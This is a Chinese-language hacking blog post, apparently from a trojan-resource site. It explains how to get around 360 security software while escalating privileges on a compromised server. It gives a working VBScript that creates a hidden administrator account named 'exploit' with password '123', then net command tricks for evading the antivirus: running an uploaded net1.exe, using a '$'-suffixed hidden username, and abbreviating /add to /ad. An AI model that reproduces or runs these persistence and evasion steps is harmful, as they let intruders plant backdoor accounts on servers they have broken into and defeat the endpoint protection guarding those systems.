突破360防黑加固添加服务器用户 - 中国木马资源网

作者:admin2016-1-16 0:32分类: 黑客技术,黑客渗透网站文章 标签: 过360拦截cmd添加用户命令

360拦截添加用户cmd.jpg

大家都知道360是一个非常让人蛋疼的防御系统,因为免费的缘故也的确普及的非常广泛,当我们日站提权的时候,添加用户总是会被360杀掉,于是我们不能束手就擒,以下是几个绕过的方法!


首先是一个比较麻烦的方法,就是通过VBS脚本添加管理员用户,脚本内容如下:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")   
os="WinNT://"&wsnetwork.ComputerName   
Set ob=GetObject(os) '得到adsi接口,绑定   
Set oe=GetObject(os&"/Administrators,group") '属性,admin组   
Set od=ob.Create("user","exploit") '建立用户   
od.SetPassword "123" '设置密码   
od.SetInfo '保存   
Set of=GetObject(os&"/exploit",user) '得到用户   
oe.add os&"/exploit"

代码通俗易懂,相信大家都看得懂吧,我就不解释了!


方法二:
360以前是直接杀你的net进程,让你无法添加用户,那么也就是说上传一个net1.exe然后执行命令net1 user exploit$ 123 /add就能够绕过了。
但是最近360这货学乖了,不关你是net还是net1照样杀,那么我们该怎么办呢?
不知道大家发现没有,在windows下 /add和/ad的效果是一样的,同理,/del也可以用/de 来代替!
如此,我们就可以使用命令net user exploit$ exploit /ad 骗过360的法眼。
来源:asp大马官网 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/969 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~